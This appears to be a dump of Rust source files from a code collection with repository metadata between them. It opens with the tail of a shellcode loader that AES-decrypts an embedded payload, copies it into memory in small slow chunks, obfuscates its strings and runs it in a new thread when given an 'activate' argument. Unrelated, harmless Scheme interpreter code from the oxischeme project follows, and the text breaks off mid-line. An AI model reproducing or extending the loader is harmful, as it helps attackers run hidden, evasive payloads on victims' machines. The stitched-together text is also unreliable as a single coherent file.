custom_sleep(100); let mut thread_handle : *mut c_void = std::ptr::null_mut(); NtCreateThreadEx(&mut thread_handle, MAXIMUM_ALLOWED, std::ptr::null_mut(), NtCurrentProcess, map_ptr, std::ptr::null_mut(), 0, 0, 0, 0, std::ptr::null_mut()); NtWaitForSingleObject(thread_handle, 0, std::ptr::null_mut()); } } fn copy_nonoverlapping_gradually(&mut self, map_ptr: *mut u8) { unsafe { let sc_ptr = self.shellcode.as_ptr(); let mut i = 0; while i < self.shellcode.len()+33 { std::ptr::copy_nonoverlapping(sc_ptr.offset(i as isize), map_ptr.offset(i as isize), 32); i += 32; #[cfg(debug_assertions)] if i % 3200 == 0 || i > self.shellcode.len() { println!("{}{}{}{}{}", obfstr!("[+] [total written] ["), i, obfstr!("B/"), self.shellcode.len(), obfstr!("B]")); } custom_sleep(2); } } } } const SHELLCODE_BYTES: &[u8] = include_bytes!("../shellcode.enc"); const SHELLCODE_LENGTH: usize = SHELLCODE_BYTES.len(); #[no_mangle] #[link_section = ".text"] static SHELLCODE: [u8; SHELLCODE_LENGTH] = *include_bytes!("../shellcode.enc"); static AES_KEY: [u8; 16] = *include_bytes!("../aes.key"); static AES_IV: [u8; 16] = *include_bytes!("../aes.iv"); fn decrypt_shellcode_stub() -> Vec<u8> { let mut cipher = Aes128Cfb::new_from_slices(&AES_KEY, &AES_IV).unwrap(); let mut buf = SHELLCODE.to_vec(); cipher.decrypt(&mut buf); buf } fn custom_sleep(delay: u8) { for _ in 0..delay { for _ in 0..10 { for _ in 0..10 { for _ in 0..10 { print!("{}", obfstr!("")); } } } } } fn main() { let args: Vec<String> = env::args().collect(); if args[1] == obfstr!("activate") { let mut injector = Injector::new(decrypt_shellcode_stub()); injector.run_in_current_process(); } }
rust
MIT
67d23f30da113b687822405ec7729ab865f107ca
2026-01-04T20:21:17.128549Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/environment.rs
src/environment.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! The implementation of the Scheme environment binding symbols to values. //! //! This is split into two pieces: //! //! 1. The `Environment` associates symbol names with a concrete location where //! the symbol's value can be found at runime. This is static information used //! during the syntactic analysis. //! //! 2. `Activation`s are instances of lexical blocks (either a lambda invocation, //! or the global top level) at runtime. They only contain values and none of the //! metadata mapping names to these values. After syntactic analysis, we only //! deal with activations, and we no longer need the symbols nor the //! `Environment`. use std::collections::{HashMap}; use std::default::{Default}; use std::fmt; use std::hash; use heap::{ArenaPtr, GcThing, Heap, IterGcThing, Rooted, ToGcThing, Trace}; use value::{Value, RootedValue}; /// An `Activation` represents a runtime instance of a lexical block (either a /// lambda or the global top-level). pub struct Activation { /// The parent scope, or `None` if this is the global activation. parent: Option<ActivationPtr>, /// For a lambda with N arguments, the first N slots are those arguments /// respectively. The rest are local definitions. If a slot is `None`, then /// it's variable hasn't been defined yet (but is referenced by something /// and potentially will be defined in the future). vals: Vec<Option<Value>>, } impl Activation { /// Extend the given `Activation` with the values supplied, resulting in a /// new `Activation` instance. pub fn extend(heap: &mut Heap, parent: &RootedActivationPtr, values: Vec<RootedValue>) -> RootedActivationPtr { let mut act = heap.allocate_activation(); act.parent = Some(**parent); act.vals = values.into_iter().map(|v| Some(*v)).collect(); return act; } /// Fetch the j'th variable from the i'th lexical activation. /// /// Returns an error when trying to fetch the value of a variable that has /// not yet been defined. pub fn fetch(&self, heap: &mut Heap, i: u32, j: u32) -> Result<RootedValue, ()> { if i == 0 { let jj = j as usize; if jj >= self.vals.len() { return Err(()); } if let Some(val) = self.vals[jj] { return Ok(Rooted::new(heap, val)); } return Err(()); } return self.parent.expect("Activation::fetch: i out of bounds") .fetch(heap, i - 1, j); } /// Set the j'th variable from the i'th lexical activation to the given /// value. /// /// Returns an error when trying to set a variable that has not yet been /// defined. pub fn update(&mut self, i: u32, j: u32, val: &RootedValue) -> Result<(), ()> { if i == 0 { let jj = j as usize; if jj >= self.vals.len() || self.vals[jj].is_none() { return Err(()); } self.vals[jj] = Some(**val); return Ok(()); } return self.parent.expect("Activation::update: i out of bounds") .update(i - 1, j, val); } fn fill_to(&mut self, n: u32) { while self.len() < n + 1 { self.vals.push(None); } } /// Define the j'th variable of this activation to be the given value. pub fn define(&mut self, j: u32, val: Value) { self.fill_to(j); self.vals[j as usize] = Some(val); } #[inline] fn len(&self) -> u32 { self.vals.len() as u32 } } impl hash::Hash for Activation { fn hash<H: hash::Hasher>(&self, state: &mut H) { self.parent.hash(state); for v in self.vals.iter() { v.hash(state); } } } impl Default for Activation { fn default() -> Activation { Activation { parent: None, vals: vec!(), } } } impl Trace for Activation { fn trace(&self) -> IterGcThing { let mut results: Vec<GcThing> = self.vals.iter() .filter_map(|v| { if let Some(val) = *v { val.to_gc_thing() } else { None } }) .collect(); if let Some(parent) = self.parent { results.push(GcThing::from_activation_ptr(parent)); } results.into_iter() } } impl fmt::Debug for Activation { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { try!(write!(f, "(activation :length {}\n", self.vals.len())); try!(write!(f, " :parent ")); if let Some(ref p) = self.parent { write!(f, "Some({:?}))", **p) } else { write!(f, "None)") } } } /// A pointer to an `Activation` on the heap. pub type ActivationPtr = ArenaPtr<Activation>; impl ToGcThing for ActivationPtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_activation_ptr(*self)) } } /// A rooted pointer to an `Activation` on the heap. pub type RootedActivationPtr = Rooted<ActivationPtr>; /// The `Environment` represents what we know about bindings statically, during /// syntactic analysis. pub struct Environment { /// A hash map for each lexical block we are currently in, which maps from a /// variable name to its position in any activations that get created for /// this block. bindings: Vec<HashMap<String, u32>>, } impl Environment { /// Create a new `Environemnt`. pub fn new() -> Environment { Environment { bindings: vec!(HashMap::new()) } } /// Extend the environment with a new lexical block with the given set of /// variables. pub fn extend(&mut self, names: Vec<String>) { self.bindings.push(HashMap::new()); for n in names.into_iter() { self.define(n); } } /// Pop off the youngest lexical block. pub fn pop(&mut self) { assert!(self.bindings.len() > 1, "Should never pop off the global environment"); self.bindings.pop(); } /// Define a variable in the youngest block and return the coordinates to /// get its value from an activation at runtime. pub fn define(&mut self, name: String) -> (u32, u32) { if let Some(n) = self.youngest().get(&name) { return (0, *n); } let n = self.youngest().len() as u32; self.youngest().insert(name, n); return (0, n); } /// Define a global variable and return its activation coordinates. pub fn define_global(&mut self, name: String) -> (u32, u32) { let n = self.bindings[0].len() as u32; self.bindings[0].insert(name, n); return ((self.bindings.len() - 1) as u32, n); } /// Get the activation coordinates associated with the given variable name. pub fn lookup(&self, name: &String) -> Option<(u32, u32)> { for (i, bindings) in self.bindings.iter().rev().enumerate() { if let Some(j) = bindings.get(name) { return Some((i as u32, *j)); } } return None; } fn youngest<'a>(&'a mut self) -> &'a mut HashMap<String, u32> { let last_idx = self.bindings.len() - 1; &mut self.bindings[last_idx] } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/value.rs
src/value.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Scheme value implementation. use std::collections::{HashSet}; use std::default::{Default}; use std::fmt; use std::hash; use environment::{ActivationPtr, RootedActivationPtr}; use eval::{Meaning, TrampolineResult}; use heap::{ArenaPtr, GcThing, Heap, IterGcThing, Rooted, RootedStringPtr, StringPtr, ToGcThing, Trace}; use primitives::{PrimitiveFunction}; /// A cons cell is a pair of `car` and `cdr` values. A list is one or more cons /// cells, daisy chained together via the `cdr`. A list is "proper" if the last /// `cdr` is `Value::EmptyList`, or the scheme value `()`. Otherwise, it is /// "improper". #[derive(Copy, Eq, Hash, PartialEq)] pub struct Cons { car: Value, cdr: Value, } impl Default for Cons { /// Do not use this method, instead allocate cons cells on the heap with /// `Heap::allocate_cons` and get back a `ConsPtr`. fn default() -> Cons { Cons { car: Value::EmptyList, cdr: Value::EmptyList, } } } impl Cons { /// Get the car of this cons cell. pub fn car(&self, heap: &mut Heap) -> RootedValue { Rooted::new(heap, self.car) } /// Get the cdr of this cons cell. pub fn cdr(&self, heap: &mut Heap) -> RootedValue { Rooted::new(heap, self.cdr) } /// Set the car of this cons cell. pub fn set_car(&mut self, car: &RootedValue) { self.car = **car; } /// Set the cdr of this cons cell. pub fn set_cdr(&mut self, cdr: &RootedValue) { self.cdr = **cdr; } } impl Trace for Cons { fn trace(&self) -> IterGcThing { let mut results = vec!(); if let Some(car) = self.car.to_gc_thing() { results.push(car); } if let Some(cdr) = self.cdr.to_gc_thing() { results.push(cdr); } results.into_iter() } } /// A pointer to a cons cell on the heap. pub type ConsPtr = ArenaPtr<Cons>; impl ToGcThing for ConsPtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_cons_ptr(*self)) } } /// A rooted pointer to a cons cell on the heap. pub type RootedConsPtr = Rooted<ConsPtr>; /// User defined procedures are represented by their body and a pointer to the /// activation that they were defined within. pub struct Procedure { pub arity: u32, pub body: Option<Box<Meaning>>, pub act: Option<ActivationPtr>, } impl Default for Procedure { fn default() -> Procedure { Procedure { body: None, act: None, arity: 0, } } } impl Trace for Procedure { fn trace(&self) -> IterGcThing { // We don't need to trace the body because a `Meaning` can only contain // rooted GC things to ensure that quotations will always return the // same object rather than generate new equivalent-but-not-`eq?` // objects. vec!(GcThing::from_activation_ptr(self.act.expect( "Should never trace an uninitialized Procedure"))).into_iter() } } impl hash::Hash for Procedure { fn hash<H: hash::Hasher>(&self, state: &mut H) { self.arity.hash(state); self.act.hash(state); self.body.as_ref() .expect("Should never hash an uninitialized Procedure") .hash(state); } } /// A pointer to a `Procedure` on the heap. pub type ProcedurePtr = ArenaPtr<Procedure>; impl ToGcThing for ProcedurePtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_procedure_ptr(*self)) } } /// A rooted pointer to a `Procedure` on the heap. pub type RootedProcedurePtr = Rooted<ProcedurePtr>; /// A primitive procedure, such as Scheme's `+` or `cons`. #[derive(Copy)] pub struct Primitive { /// The function implementing the primitive. function: PrimitiveFunction, /// The name of the primitive. name: &'static str, } impl PartialEq for Primitive { fn eq(&self, rhs: &Self) -> bool { self.function as usize == rhs.function as usize } } impl Eq for Primitive { } impl hash::Hash for Primitive { fn hash<H: hash::Hasher>(&self, state: &mut H) { let u = self.function as usize; u.hash(state); } } impl Primitive { #[inline] pub fn call(&self, heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { (self.function)(heap, args) } } impl fmt::Debug for Primitive { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.name) } } /// `Value` represents a scheme value of any type. /// /// Note that `Eq` and `PartialEq` are object identity, not structural /// comparison, same as with [`ArenaPtr`](struct.ArenaPtr.html). #[derive(Copy, Eq, Hash, PartialEq, Debug)] pub enum Value { /// The empty list: `()`. EmptyList, /// The scheme pair type is a pointer to a GC-managed `Cons` cell. Pair(ConsPtr), /// The scheme string type is a pointer to a GC-managed `String`. String(StringPtr), /// Scheme symbols are also implemented as a pointer to a GC-managed /// `String`. Symbol(StringPtr), /// Scheme integers are represented as 64 bit integers. Integer(i64), /// Scheme booleans are represented with `bool`. Boolean(bool), /// Scheme characters are `char`s. Character(char), /// A user-defined Scheme procedure is a pointer to a GC-managed /// `Procedure`. Procedure(ProcedurePtr), /// A primitive Scheme procedure is just a pointer to a `Primitive` type /// function pointer. Primitive(Primitive), } /// # `Value` Constructors impl Value { /// Create a new integer value. pub fn new_integer(i: i64) -> Value { Value::Integer(i) } /// Create a new boolean value. pub fn new_boolean(b: bool) -> Value { Value::Boolean(b) } /// Create a new character value. pub fn new_character(c: char) -> Value { Value::Character(c) } /// Create a new cons pair value with the given car and cdr. pub fn new_pair(heap: &mut Heap, car: &RootedValue, cdr: &RootedValue) -> RootedValue { let mut cons = heap.allocate_cons(); cons.set_car(car); cons.set_cdr(cdr); Rooted::new(heap, Value::Pair(*cons)) } /// Create a new procedure with the given parameter list and body. pub fn new_procedure(heap: &mut Heap, arity: u32, act: &RootedActivationPtr, body: Meaning) -> RootedValue { let mut procedure = heap.allocate_procedure(); procedure.arity = arity; procedure.act = Some(**act); procedure.body = Some(Box::new(body)); Rooted::new(heap, Value::Procedure(*procedure)) } pub fn new_primitive(name: &'static str, function: PrimitiveFunction) -> Value { Value::Primitive(Primitive { name: name, function: function }) } /// Create a new string value with the given string. pub fn new_string(heap: &mut Heap, str: String) -> RootedValue { let mut value = heap.allocate_string(); value.clear(); value.push_str(str.as_slice()); Rooted::new(heap, Value::String(*value)) } /// Create a new symbol value with the given string. pub fn new_symbol(heap: &mut Heap, str: RootedStringPtr) -> RootedValue { Rooted::new(heap, Value::Symbol(*str)) } } /// # `Value` Methods impl Value { /// Assuming this value is a cons pair, get its car value. Otherwise, return /// `None`. pub fn car(&self, heap: &mut Heap) -> Option<RootedValue> { match *self { Value::Pair(ref cons) => Some(cons.car(heap)), _ => None, } } /// Assuming this value is a cons pair, get its cdr value. Otherwise, return /// `None`. pub fn cdr(&self, heap: &mut Heap) -> Option<RootedValue> { match *self { Value::Pair(ref cons) => Some(cons.cdr(heap)), _ => None, } } /// Return true if this value is a pair, false otherwise. pub fn is_pair(&self) -> bool { match *self { Value::Pair(_) => true, _ => false, } } /// Return true if this value is an atom, false otherwise. pub fn is_atom(&self) -> bool { !self.is_pair() } /// Coerce this symbol value to a `StringPtr` to the symbol's string name. pub fn to_symbol(&self, heap: &mut Heap) -> Option<RootedStringPtr> { match *self { Value::Symbol(sym) => Some(Rooted::new(heap, sym)), _ => None, } } /// Coerce this pair value to a `ConsPtr` to the cons cell this pair is /// referring to. pub fn to_pair(&self, heap: &mut Heap) -> Option<RootedConsPtr> { match *self { Value::Pair(cons) => Some(Rooted::new(heap, cons)), _ => None, } } /// Coerce this procedure value to a `ProcedurePtr` to the `Procedure` this /// value is referring to. pub fn to_procedure(&self, heap: &mut Heap) -> Option<RootedProcedurePtr> { match *self { Value::Procedure(p) => Some(Rooted::new(heap, p)), _ => None, } } /// Coerce this integer value to its underlying `i64`. pub fn to_integer(&self) -> Option<i64> { match *self { Value::Integer(ref i) => Some(*i), _ => None, } } /// Assuming that this value is a proper list, get the length of the list. pub fn len(&self) -> Result<u64, ()> { match *self { Value::EmptyList => Ok(0), Value::Pair(p) => { let cdr_len = try!(p.cdr.len()); Ok(cdr_len + 1) }, _ => Err(()), } } /// Iterate over this list value. pub fn iter(&self) -> ConsIterator { ConsIterator { val: *self } } } impl ToGcThing for Value { fn to_gc_thing(&self) -> Option<GcThing> { match *self { Value::String(str) => Some(GcThing::from_string_ptr(str)), Value::Symbol(sym) => Some(GcThing::from_string_ptr(sym)), Value::Pair(cons) => Some(GcThing::from_cons_ptr(cons)), Value::Procedure(p) => Some(GcThing::from_procedure_ptr(p)), _ => None, } } } fn print(f: &mut fmt::Formatter, val: &Value, seen: &mut HashSet<ConsPtr>) -> fmt::Result { match *val { Value::EmptyList => write!(f, "()"), Value::Pair(ref cons) => { try!(write!(f, "(")); try!(print_pair(f, cons, seen)); write!(f, ")") }, Value::String(ref str) => { try!(write!(f, "\"")); try!(write!(f, "{}", **str)); write!(f, "\"") }, Value::Symbol(ref s) => write!(f, "{}", **s), Value::Integer(ref i) => write!(f, "{}", i), Value::Boolean(ref b) => { write!(f, "{}", if *b { "#t" } else { "#f" }) }, Value::Character(ref c) => match *c { '\n' => write!(f, "#\\newline"), '\t' => write!(f, "#\\tab"), ' ' => write!(f, "#\\space"), _ => write!(f, "#\\{}", c), }, Value::Procedure(ref p) => write!(f, "#<procedure {:?}>", p), Value::Primitive(ref p) => write!(f, "#<procedure {:?}>", p), } } /// Print the given cons pair, without the containing "(" and ")". fn print_pair(f: &mut fmt::Formatter, cons: &ConsPtr, seen: &mut HashSet<ConsPtr>) -> fmt::Result { if seen.contains(cons) { return write!(f, "<cyclic value>"); } seen.insert(*cons); try!(print(f, &cons.car, seen)); if let Value::Pair(rest) = cons.cdr { if seen.contains(&rest) { return write!(f, " . <cyclic value>"); } } match cons.cdr { Value::EmptyList => Ok(()), Value::Pair(ref cdr) => { try!(write!(f, " ")); print_pair(f, cdr, seen) }, ref val => { try!(write!(f, " . ")); print(f, val, seen) }, } } impl fmt::Display for Value { /// Print the given value's text representation to the given writer. This is /// the opposite of `Read`. fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { print(f, self, &mut HashSet::new()) } } pub type RootedValue = Rooted<Value>; /// Either a Scheme `RootedValue`, or a `String` containing an error message. pub type SchemeResult = Result<RootedValue, String>; /// An iterator which yields `Ok` for each value in a cons-list and finishes /// with `None` when the end of the list is reached (the scheme empty list /// value) or `Err` when iterating over an improper list. /// /// For example: the list `(1 2 3)` would yield `Ok(1)`, `Ok(2)`, `Ok(3)`, /// `None`, while the improper list `(1 2 . 3)` would yield `Ok(1)`, `Ok(2)`, /// `Err`. #[derive(Copy)] pub struct ConsIterator { val: Value } impl Iterator for ConsIterator { type Item = Result<Value, ()>; fn next(&mut self) -> Option<Result<Value, ()>> { match self.val { Value::EmptyList => None, Value::Pair(cons) => { let Cons { car, cdr } = *cons; self.val = cdr; Some(Ok(car)) }, _ => Some(Err(())), } } } /// A helper utility to create a cons list from the given values. pub fn list(heap: &mut Heap, values: &[RootedValue]) -> RootedValue { list_helper(heap, &mut values.iter()) } fn list_helper<'a, T: Iterator<Item=&'a RootedValue>>(heap: &mut Heap, values: &mut T) -> RootedValue { match values.next() { None => Rooted::new(heap, Value::EmptyList), Some(car) => { let rest = list_helper(heap, values); Value::new_pair(heap, car, &rest) }, } } /// ## The 28 car/cdr compositions. impl Cons { pub fn cddr(&self, heap: &mut Heap) -> SchemeResult { self.cdr.cdr(heap).ok_or("bad cddr".to_string()) } pub fn cdddr(&self, heap: &mut Heap) -> SchemeResult { let cddr = try!(self.cddr(heap)); cddr.cdr(heap).ok_or("bad cdddr".to_string()) } // TODO FITZGEN: cddddr pub fn cadr(&self, heap: &mut Heap) -> SchemeResult { self.cdr.car(heap).ok_or("bad cadr".to_string()) } pub fn caddr(&self, heap: &mut Heap) -> SchemeResult { let cddr = try!(self.cddr(heap)); cddr.car(heap).ok_or("bad caddr".to_string()) } pub fn cadddr(&self, heap: &mut Heap) -> SchemeResult { let cdddr = try!(self.cdddr(heap)); cdddr.car(heap).ok_or("bad caddr".to_string()) } // TODO FITZGEN ... } #[cfg(test)] mod tests { use eval::{evaluate_file}; use heap::{Heap}; #[test] fn test_print_cycle() { let heap = &mut Heap::new(); evaluate_file(heap, "./tests/test_print_cycle.scm") .ok() .expect("Should be able to eval a file."); assert!(true, "Shouldn't get stuck in an infinite loop printing a cyclic value"); } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/primitives.rs
src/primitives.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Implementation of primitive procedures. use environment::{ActivationPtr, Environment}; use eval::{apply_invocation, Trampoline, TrampolineResult}; use heap::{Heap, Rooted}; use read::{Read}; use value::{RootedValue, Value}; /// The function signature for primitives. pub type PrimitiveFunction = fn(&mut Heap, Vec<RootedValue>) -> TrampolineResult; fn cons(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref car, ref cdr] = args.as_slice() { Ok(Trampoline::Value(Value::new_pair(heap, car, cdr))) } else { Err("Error: bad arguments to `cons`".to_string()) } } fn car(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { arg.car(heap) .ok_or(format!("Error: cannot take car of non-cons: {}", **arg)) .map(|v| Trampoline::Value(v)) } else { Err("Error: bad arguments to `car`".to_string()) } } fn set_car_bang(heap: &mut Heap, mut args: Vec<RootedValue>) -> TrampolineResult { if let [ref mut cons, ref val] = args.as_mut_slice() { if let &mut Value::Pair(ref mut cons) = &mut **cons { cons.set_car(val); return Ok(Trampoline::Value(heap.unspecified_symbol())); } return Err(format!("Can't set-car! on non-cons: {}", **cons)); } else { Err("Error: bad arguments to `set-car!`".to_string()) } } fn cdr(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { arg.cdr(heap) .ok_or(format!("Error: cannot take cdr of non-cons: {}", **arg)) .map(|v| Trampoline::Value(v)) } else { Err("Error: bad arguments to `cdr`".to_string()) } } fn set_cdr_bang(heap: &mut Heap, mut args: Vec<RootedValue>) -> TrampolineResult { if let [ref mut cons, ref val] = args.as_mut_slice() { if let &mut Value::Pair(ref mut cons) = &mut **cons { cons.set_cdr(val); return Ok(Trampoline::Value(heap.unspecified_symbol())); } return Err(format!("Can't set-cdr! on non-cons: {}", **cons)); } else { Err("Error: bad arguments to `set-cdr!`".to_string()) } } fn list(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { use value; Ok(Trampoline::Value(value::list(heap, args.as_slice()))) } fn length(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { let len = try!(arg.len().ok().ok_or( format!("Error: can only take length of proper lists, got {}", **arg))); Ok(Trampoline::Value(Rooted::new(heap, Value::new_integer(len as i64)))) } else { Err("Error: bad arguments to `length`".to_string()) } } fn apply(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { // Note: we don't support concatenating many argument lists yet: // // (apply f '(1 2) '(3 4)) == (apply f '(1 2 3 4)) // // We should suport that eventually. if let [ref proc_val, ref args] = args.as_slice() { let v : Vec<RootedValue> = try!(args.iter() .map(|result_val| { result_val .map(|r| Rooted::new(heap, r)) .map_err(|_| "Must pass a proper list to `apply`".to_string()) }) .collect()); apply_invocation(heap, proc_val, v) } else { Err("Error: bad arguments to `apply`".to_string()) } } fn error(_: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { let mut string = String::from_str("ERROR!"); for val in args.iter() { string.push_str(format!("\n\t{}", **val).as_slice()); } Err(string) } fn print(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { for val in args.iter() { println!("{}", **val); } Ok(Trampoline::Value(heap.unspecified_symbol())) } fn read(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { // Only supports reading from stdin right now. use std::old_io; if args.len() != 0 { return Err("`read` called with too many parameters".to_string()); } let stdin = old_io::stdio::stdin(); let reader = Read::new(stdin, heap, "stdin".to_string()); for (_, read_result) in reader { let form = try!(read_result); return Ok(Trampoline::Value(form)); } Ok(Trampoline::Value(heap.eof_symbol())) } fn not(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Boolean(b) if b == false => true, _ => false, })))) } else { Err("Error: bad arguments to `not`".to_string()) } } fn null_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(**arg == Value::EmptyList)))) } else { Err("Error: bad arguments to `null?`".to_string()) } } fn pair_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Pair(_) => true, _ => false, })))) } else { Err("Error: bad arguments to `pair?`".to_string()) } } fn atom_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Pair(_) => false, _ => true, })))) } else { Err("Error: bad arguments to `atom?`".to_string()) } } fn eq_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(*a == *b)))) } else { Err("Error: bad arguments to `eq?`".to_string()) } } fn symbol_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Symbol(_) => true, _ => false })))) } else { Err("Error: bad arguments to `symbol?`".to_string()) } } fn number_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::Integer(_) => true, _ => false })))) } else { Err("Error: bad arguments to `number?`".to_string()) } } fn string_question(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref arg] = args.as_slice() { Ok(Trampoline::Value(Rooted::new(heap, Value::new_boolean(match **arg { Value::String(_) => true, _ => false })))) } else { Err("Error: bad arguments to `string?`".to_string()) } } fn number_equal(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `=` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `=` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(first == second)))) } else { Err("Error: bad arguments to `=`".to_string()) } } fn gt(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `>` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `>` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(first > second)))) } else { Err("Error: bad arguments to `>`".to_string()) } } fn lt(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `<` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `<` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_boolean(first < second)))) } else { Err("Error: bad arguments to `<`".to_string()) } } fn add(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `+` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `+` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first + second)))) } else { Err("Error: bad arguments to `+`".to_string()) } } fn subtract(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `-` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `-` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first - second)))) } else { Err("Error: bad arguments to `-`".to_string()) } } fn divide(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `/` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `/` with non-numbers".to_string())); if second == 0 { return Err("Error: divide by zero".to_string()); } Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first / second)))) } else { Err("Error: bad arguments to `/`".to_string()) } } fn multiply(heap: &mut Heap, args: Vec<RootedValue>) -> TrampolineResult { if let [ref a, ref b] = args.as_slice() { let first = try!(a.to_integer().ok_or( "Error: cannot use `*` with non-numbers".to_string())); let second = try!(b.to_integer().ok_or( "Error: cannot use `*` with non-numbers".to_string())); Ok(Trampoline::Value( Rooted::new(heap, Value::new_integer(first * second)))) } else { Err("Error: bad arguments to `*`".to_string()) } } fn define_primitive(env: &mut Environment, act: &mut ActivationPtr, name: &'static str, function: PrimitiveFunction) { let (i, j) = env.define(name.to_string()); assert!(i == 0, "All primitives should be defined on the global activation"); act.define(j, Value::new_primitive(name, function)); } pub fn define_primitives(env: &mut Environment, act: &mut ActivationPtr) { define_primitive(env, act, "cons", cons); define_primitive(env, act, "car", car); define_primitive(env, act, "set-car!", set_car_bang); define_primitive(env, act, "cdr", cdr); define_primitive(env, act, "set-cdr!", set_cdr_bang); define_primitive(env, act, "list", list); define_primitive(env, act, "length", length); define_primitive(env, act, "apply", apply); define_primitive(env, act, "error", error); define_primitive(env, act, "print", print); define_primitive(env, act, "read", read); define_primitive(env, act, "not", not); define_primitive(env, act, "null?", null_question); define_primitive(env, act, "pair?", pair_question); define_primitive(env, act, "atom?", atom_question); define_primitive(env, act, "eq?", eq_question); define_primitive(env, act, "symbol?", 